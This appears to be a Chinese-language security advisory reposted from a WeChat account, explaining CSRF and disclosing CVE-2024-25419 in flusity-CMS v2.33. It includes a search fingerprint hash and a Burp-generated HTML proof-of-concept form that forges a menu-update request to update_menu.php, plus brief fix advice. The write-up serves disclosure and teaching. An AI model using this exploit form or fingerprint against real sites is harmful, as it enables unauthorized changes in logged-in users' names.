免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
flusity-2.33 CSRF漏洞
02
—
CSRF漏洞原理
终于遇到一个热乎的CSRF漏洞,虽然覆盖面小,但还是学习下,先了解下什么是CSRF。
CSRF(Cross-site request forgery)跨站请求伪造,是一种劫持用户身份,以用户名义进行非预期操作,通常发生在用户在访问恶意网站或收到恶意邮件后。
攻击者通过一些方式诱使用户进入一个恶意网站,然后在该站点中插入一个链接或表单,该链接或表单通过用户的浏览器发出非预期的请求,伪造用户身份执行某种操作,如修改密码、转账、发布帖子等。
CSRF与XSS听起来很像,但攻击方式完全不同。XSS攻击是利用受信任的站点攻击客户端用户,而CSRF是伪装成受信任的用户攻击受信任的站点。
条件:
-
用户已经登录了目标网站或应用程序。
-
目标网站或应用程序没有使用CSRF令牌来保护请求。
-
攻击者能够构造出伪造的请求并将其发送到目标网站或应用程序。
-
用户在浏览器中打开了恶意网站或点击了恶意链接,从而使攻击者能够利用用户的身份进行 CSRF 攻击。
03
—
漏洞影响
flusity-CMS v2.33版本
开源地址:https://github.com/flusity/flusity-CMS
04
—
漏洞描述
flusity-CMS v2.33中的组件/core/tools/update_menu.php存在跨站请求伪造(CSRF)漏洞。攻击者可以通过利用该漏洞来执行未经授权的操作,可能导致用户的信息泄露或攻击者获取对系统的未授权访问权限。建议及时升级软件版本或采取其他安全措施来修复该漏洞。
05
—
icon_hash="1107917621"
06
—
漏洞复现
POC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/core/tools/update_menu.php" method="POST">
<input type="hidden" name="action" value="update_menu" />
<input type="hidden" name="menu_id" value="12" />
<input type="hidden" name="menu_name" value="Kontaktai123" />
<input type="hidden" name="lang_menu_name" value="Contact" />
<input type="hidden" name="page_url" value="contacts" />
<input type="hidden" name="position" value="2" />
<input type="hidden" name="template" value="template_contacts" />
<input type="hidden" name="show_in_menu" value="1" />
<input type="hidden" name="parent_id" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
漏洞复现成功
07
—
修复建议
升级到最新版。
08
—
CSRF防范建议
09
—
新粉丝
原文始发于微信公众号(AI与网安):CVE-2024-25419
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论